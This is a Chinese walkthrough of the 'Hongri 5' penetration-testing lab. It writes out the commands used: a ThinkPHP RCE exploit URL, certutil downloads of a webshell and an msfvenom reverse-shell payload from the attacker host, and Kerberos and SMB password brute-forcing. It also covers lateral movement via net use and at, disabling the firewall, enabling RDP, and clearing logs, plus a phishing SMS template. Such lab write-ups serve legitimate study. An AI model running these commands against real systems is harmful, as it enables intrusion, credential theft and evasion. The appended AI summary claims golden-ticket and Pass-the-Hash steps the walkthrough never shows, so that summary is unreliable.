谢绝捷径的诱惑,文字才能拥有直抵人心的力量
简介
"红日5"是一个高度仿真的内网渗透实战靶场,模拟了企业级内外网混合环境。靶场包含外网Web服务器(Windows 7)、内网域控服务器(Windows Server 2008)双重网络隔离场景,涵盖ThinkPHP RCE漏洞利用、权限提升、代理穿透、横向移动、域渗透等核心攻击链。通过该靶场,学习者可掌握主机发现、漏洞利用、隧道搭建、凭证窃取、社会工程学、Pass-the-Hash等APT攻击手法,并深入理解企业内网安全防护的薄弱环节。
最近红日官网已恢复正常访问,如果懒得一个一个转存可以直接拿我的,一共500G左右,下载还请预留好一定的空间通过网盘分享的文件:红日靶场
链接: https://pan.baidu.com/s/1ppyPlm6osobxReI50fCSZw 提取码: uze8
环境配置
设置好仅主机的vm2,138网段,然后我的nat模式网卡是135网段模拟公网
这个靶机呢一共有两个,
外网主机win7,设置好仅主机模式和nat模式两个网卡
内网域控服务器
win7
sunheart 密码:123.com
sunAdministrator 密码:dc123.com
2008(登录成功后要修改密码)
sunadmin 密码:2020.com
最重要的,需要在win7主机phpstudy开启web服务
网络拓扑结构,画的很潦草,看看就好
外网信息打点
利用arp-scan进行主机探测
arp-scan -l
利用nmap对目标主机进行端口扫描
nmap -sS 192.168.135.150 -p- -A
目标机器开启了80、135和3306数据库远程,mysql远程测试,拒绝连接
┌──(root㉿kali)-[~]└─# mysql -uroot -h192.168.135.150 -pEnter password:ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '192.168.135.128'isnot allowed to connect to this MySQL server
查看web站点,可以看到这是一个thinkphp框架
随便访问一个不存在的页面,发现指纹信息,5.0.22版本
寻找exp
searchsploit 5.0 thinkphp
已知我们的版本为5.0.22
searchsploit -m 46150cat 46150.txt | grep 5.0.22
拼凑EXP,执行命令whoami,成功利用
http://192.168.135.150/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
查看当前目录
http://192.168.135.150/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=chdir
使用generate
生成混淆的webshell,不容易被查杀
weevely generate cmd shell.php
从kali下载webshell
http://192.168.135.150/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=certutil -urlcache -split -f http://192.168.135.128:5000/shell.php
kali连接webshell
查看内网IP,发现内网网段
ipconfig
利用arp进行主机探测,发现域控主机192.168.138.138
arp -a
开始代理reGeorg
,详细使用方法<a "https:="" href="https://mp.weixin.qq.com/s?__biz=Mzg2Nzk0NjA4Mg==&mid=2247498989&idx=1&sn=a860e19fe2d20c9b8aa5cc9ca81ac488&scene=21#wechat_redirect">三种代理方法打入内网
certutil -urlcache -split -f http://192.168.135.128:5000/tunnel.php
访问网页,发现直接报错,可能不适用windows了
那么切换frp
,查看一下配置文件,注意这里是windows的frp,我用的版本是0.39.1,去github翻一翻历史版本的,新版本可能会出问题
上传到靶机上面去,有两个文件,一个程序一个配置文件
然后修改服务端的代理配置
vi /etc/proxychains4.conf
使用proxychains
打开MSF,利用永恒之蓝漏洞,打域控靶机,这里失败了
proxychains msfconsolesearch ms17_010_eternalblueuse 0set rhosts 192.168.138.138run
这个时候我们就可以使用端口扫描进行信息收集(连接某些未开放端口的时候可能会显示超时,这是正常现象,继续等待即可)
use scanner/portscan/tcpset RHOSTS 192.168.138.138run
不使用msf也可以使用nmap
proxychains nmap -Pn -sT 192.168.138.138
查看域信息sun.com
whoami并不是超级管理员也不是系统用户,这下我们就需要提权了,只有上升到系统权限才能使用mimikatz抓取hash
注意使用x64模块,不用msf的话也可以上传nc反弹shell
# kalimsfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=2222 LHOST=192.168.135.128 -f exe -o shellx64.exe# 靶机certutil -urlcache -split -f http://192.168.135.128:5000/shellx64.exe
进入msf
use multi/handlerset LHOST 192.168.135.128set lport 2222set payload windows/x64/meterpreter/reverse_tcprun
尝试使用msf的getsystem
进行提权
创建一个监听器,用于上线靶机(同理可以用nc来上线)
我们生成一个可以上线CS的exe程序
生成到d盘中,并传到kali中
scp .beacon.exe [email protected]:/data/windows_atk
并使用msf的upload上传此文件
upload /data/windows_atk/beacon.exe C:\phpStudy\PHPTutorial\WWW\public\beacon.exe
执行木马
上线cs
设置延迟执行命令 sleep 0 之后,就可以开始提权了
尝试了各种操作后,都普通用户提权失败
那么能怎么办呢——域内爆破,网上很多教程都是直接登录的administrator用户,直接用CS提权成功(上线的时候就是administartor),并没有完整的复现出来从一个最普通的用户上升到系统权限的教程,本篇文章也没有复现出来,复现过程可以参考一下
信息收集,域内用户,由于当前用户是普通用户,普通用户无法直接获取域内的用户列表
shell net view
换思路,域内不行,那就本机用户,可以看到有一个administrator
用户
shell net user
那么这个用户也可能是域内的管理员用户吧?我们可以利用msf的kerberos_enumusers
爆破 Kerberos 服务(88 端口,前面端口扫描的时候扫出来)
proxychains msfconsoleuse gather/kerberos_enumusersset DOMAIN sun.comset RHOSTS 192.168.138.138set USERNAME Administratorset PASS_FILE /data/SecLists_Dict/Passwords/darkweb2017-top1000.txtset THREADS 4run
成功爆破出来用户密码为dc123.com
注意:如果不用CS那么可以利用 hydra 进行爆破
proxychains hydra -l Administrator -P pass.txt -s 445 -t 4 -vV -m "SMB" smb://192.168.138.138
我们尝试使用其他用户上线呢
我们尝试使用其他用户身份上线
以本地用户登录失败,那么就切换到域控服务器
需要让我们输入密码,但是msf上线的不是交互式shell
连接并查看域控,也失败
使用PsExec模块攻击域控,失败!
proxychains msfconsolemsf6 > use exploit/windows/smb/psexecmsf6 > set RHOSTS 192.168.138.138# 域控IPmsf6 > set SMBUser Administratormsf6 > set SMBPass dc123.commsf6 > set SMBDomain sun.commsf6 > set PAYLOAD windows/x64/meterpreter/bind_tcp # 内网直连msf6 > run
试了很多方法都不行,最终以失败告终,无法登录到域控服务器/切换本地用户,或者本地提升到Administrator用户。那么就剩下最后的办法了,社工!(诈骗案例分析,请勿用于违法用途,所造成的后果自行承担)
最近张伟管理员发了一条微博:”周末加班部署新防火墙,累成狗🐶”,
并且利用一定手段获取到了手机号。
【xxx科技IT部】紧急:OA系统漏洞需立即处理,请查收邮件并登录修复平台。确认后请回复“已处理”。
到了周末,管理员成功登录了系统,启动了phpstudy这个web服务,此时即可上线
kali连接我们的后门
weevely terminal http://192.168.135.150/shell.php cmd
运行我们的木马即可上线成功
设置svc-exe提权方式
已成功上线系统权限
抓取本地密码hash
此时就能看到密码信息了
查看域内用户
shell net user /domain
使用代理转发功能
创建一个监听器
生成需要上传到域控主机上的木马
从本机上传上去
certutil -urlcache -split -f http://192.168.135.128:5000/shellx64.exe
放行4444端口
shell netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=4444
开始将马上传到目标服务器
shell net use \192.168.138.138ipc$ "管理员密码" /user:administratorshell net useshell dir \192.168.138.138c$ # 查看域控主机目录# 将马上传到域控服务器shell copy C:phpStudyPHPTutorialWWWpublicwin7beacon.exe \192.168.138.138c$win7beacon.exe
创建执行任务,提示了我们拒绝访问
sc \192.168.138.138 create shell binpath= "c:win7beacon.exe"
那么就用另外一种方式 at ,添加一个计划任务
shell at \192.168.138.13822:10:00 c:win7beacon.exe
耐心等待一分钟既可上线,而且还是最高权限,拿下域控主机
关闭防火墙
shell netsh advfirewall set allprofiles state off
修改注册表允许远程连接
shell reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
放行3389端口
shell netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP
查看用户密码
修改代理文件,并重启frp服务
本机windows打开代理工具
可以看到我们已经能够正常访问域控主机了
刚进去是登录错误的,我们重新输入账号密码,登录到域sum.com
成功拿下域控服务器!
最后清理日志即可
至此红日5完成
deepseek总结(部分修改)
攻击路径全景
-
外网突破 -
通过 arp-scan + nmap 探测开放80/3306端口 -
利用ThinkPHP 5.0.22 RCE漏洞( /index/thinkapp/invokefunction ) -
上传混淆Webshell(Weevely)实现持久化控制
-
-
内网渗透 -
发现双网卡结构(NAT+Host-Only)及内网段192.168.138.0/24 -
使用 frp 搭建Socks5代理穿透内网边界 -
通过 proxychains + nmap 扫描域控(192.168.138.138)暴露445端口
-
-
权限提升 -
MSF生成载荷上线失败后,通过CS的 svc-exe 提权获取SYSTEM权限 -
利用 mimikatz 抓取本地管理员凭证(Administrator:dc123.com)
-
-
横向移动 -
IPC$共享+计划任务(net use + at)投递Beacon载荷 -
绕过防火墙放行端口(netsh advfirewall) -
通过RDP(注册表修改fDenyTSConnections)接管域控桌面
-
-
权限维持 -
域控主机部署多协议后门(MSF+CS双链路) -
清理日志(clearev)隐藏攻击痕迹
-
关键技术点
-
漏洞利用:ThinkPHP RCE漏洞的EXP构造与混淆Webshell上传 -
隧道搭建:Frp代理穿透双网络隔离环境 -
权限提升:CS的svc-exe提权与Windows服务劫持 -
横向移动:基于SMB的载荷投递与计划任务执行 -
域渗透:Pass-the-Hash攻击与黄金票据伪造
防御启示
-
外网防护:及时更新框架补丁,禁用危险函数(如 system ) -
权限控制:遵循最小权限原则,限制数据库远程访问 -
网络隔离:严格ACL策略,阻断异常出站流量(如Socks隧道) -
日志审计:监控计划任务创建、注册表关键项修改等可疑行为 -
域安全:启用LAPS管理本地管理员密码,限制域管登录范围
报告编制方:泷羽Sec安全团队日期:2025年2月21日
原文始发于微信公众号(泷羽Sec):红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论